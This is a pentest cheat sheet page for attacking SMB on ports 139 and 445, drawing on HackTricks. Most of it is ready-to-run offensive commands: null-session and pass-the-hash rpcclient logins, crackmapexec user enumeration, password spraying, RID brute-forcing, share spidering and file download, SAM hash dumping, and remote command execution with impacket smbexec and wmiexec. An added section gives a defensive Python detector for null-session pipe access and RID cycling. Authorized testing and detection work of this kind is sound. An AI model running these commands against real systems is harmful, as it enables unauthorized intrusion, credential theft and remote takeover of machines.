Owlglass

Pentest - SMB ports 139, 445

HackTricks

Port 139 NetBIOS

NetBIOS (Network Basic Input Output System) is a software protocol that allows applications and computers on a local area network (LAN) to communicate with network hardware and transmit data across the network.

Port 445 SMB - Server Message Block

While port 139 is known technically as ‘NBT over IP’ (NetBIOS over TCP/IP), port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Block’.

SMB

Server Message Block (SMB) is a client-server protocol that regulates access to files, entire directories and other network resources, such as printers, routers or other interfaces shared on the network.

Server Enumeration

Search for hosts:

nbtscan -r 192.168.1.1/24

SMB information

enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>

# connect to rpc
rpcclient -U "" -N <IP>   # no credentials (null session)
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP>   # with credentials
smbclient //10.10.10.10/Public -U 'anonymous' -N

See also impacket: samrdump, rpcdump

Users, Groups

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 -u usernames.txt -p '' --continue-on-success

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

Anonymous logon

crackmapexec smb <host> -u 'a' -p '' --shares

List files

crackmapexec smb <host> -u 'a' -p '' -M spider_plus

Download files

crackmapexec smb <host> -u 'a' -p '' -M spider_plus -o DOWNLOAD_FLAG=TRUE EXCLUDE_DIR=IPC$

IPC$ Share

With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following:

  • Operating system information
  • Details of the parent domain
  • A list of local users and groups
  • Details of available SMB shares
  • The effective system security policy

RID cycling with crackmapexec

crackmapexec smb <ip> -u 'a' -p '' -d <domain> --rid-brute | grep User

Then check, for example, whether any of the discovered accounts has UF_DONT_REQUIRE_PREAUTH set (AS-REP Roasting). Next, try crackmapexec against SMB with username/password combinations: passwords from a wordlist (e.g. rockyou), a customised list, or usernames used as passwords (forwards and backwards, with case changes, etc.).
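From the defender's side, the null-session IPC$ access and RID cycling described in the two sections above leave a recognisable trace in Windows Security events: a 4624 network logon for ANONYMOUS LOGON, followed by 5145 detailed-share-access events against \\*\IPC$ naming the samr / lsarpc / srvsvc pipes. The following detector is an added example, not part of the original cheat sheet; the JSON-lines events it scans are constructed for this example (field names follow the standard 4624 / 5145 schemas), and the RID-cycling threshold is deliberately low for the sample.

```python
# Added detection example, not part of the original cheat sheet: flags the
# null-session IPC$ pipe access and RID cycling described above by scanning
# Windows Security events (4624 logon, 5145 detailed share access) exported
# as JSON lines. The records in SAMPLE_LOG are constructed for this example.
import json
from collections import Counter

# Named pipes under IPC$ that enum4linux, rpcclient and RID cycling talk to.
ENUM_PIPES = {"samr", "lsarpc", "srvsvc", "netlogon", "wkssvc"}
# samr opens from one source before we call it RID cycling (tuned low for the sample).
RID_CYCLE_THRESHOLD = 3

SAMPLE_LOG = r"""
{"EventID": 4624, "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "10.10.14.5"}
{"EventID": 5145, "SubjectUserName": "ANONYMOUS LOGON", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "samr", "IpAddress": "10.10.14.5"}
{"EventID": 5145, "SubjectUserName": "ANONYMOUS LOGON", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "samr", "IpAddress": "10.10.14.5"}
{"EventID": 5145, "SubjectUserName": "ANONYMOUS LOGON", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "lsarpc", "IpAddress": "10.10.14.5"}
{"EventID": 5145, "SubjectUserName": "ANONYMOUS LOGON", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "samr", "IpAddress": "10.10.14.5"}
{"EventID": 4624, "LogonType": 3, "TargetUserName": "jsmith", "IpAddress": "10.10.14.7"}
{"EventID": 5145, "SubjectUserName": "jsmith", "ShareName": "\\\\*\\Public", "RelativeTargetName": "report.docx", "IpAddress": "10.10.14.7"}
"""


def parse_events(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_smb_enum(events):
    """Return (source_ip, finding) tuples for null-session enumeration activity."""
    findings = []
    samr_opens = Counter()  # per-source count of samr pipe opens
    for ev in events:
        src = ev.get("IpAddress", "?")
        if (ev.get("EventID") == 4624 and ev.get("LogonType") == 3
                and ev.get("TargetUserName") == "ANONYMOUS LOGON"):
            findings.append((src, "null session: anonymous network logon"))
        elif ev.get("EventID") == 5145 and ev.get("ShareName", "").endswith("IPC$"):
            pipe = ev.get("RelativeTargetName", "").lower()
            if pipe in ENUM_PIPES and ev.get("SubjectUserName") == "ANONYMOUS LOGON":
                findings.append((src, f"anonymous open of enumeration pipe {pipe}"))
            if pipe == "samr":
                samr_opens[src] += 1
                if samr_opens[src] == RID_CYCLE_THRESHOLD:
                    findings.append((src, "possible RID cycling: repeated samr opens"))
    return findings


if __name__ == "__main__":
    for src, finding in detect_smb_enum(parse_events(SAMPLE_LOG)):
        print(f"{src}: {finding}")
```

Event 5145 only appears when "Audit Detailed File Share" is enabled on the server, so confirm that policy is in place before relying on the pipe-based rules.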

SMB Command Execution

impacket-smbexec administrator:'<password>'@machine.htb

Dump sam hashes

crackmapexec smb <IP> -u <username> -p "PASSWORD" --sam

wmiexec

impacket-wmiexec <user>@<ip> -hashes "<user hash>"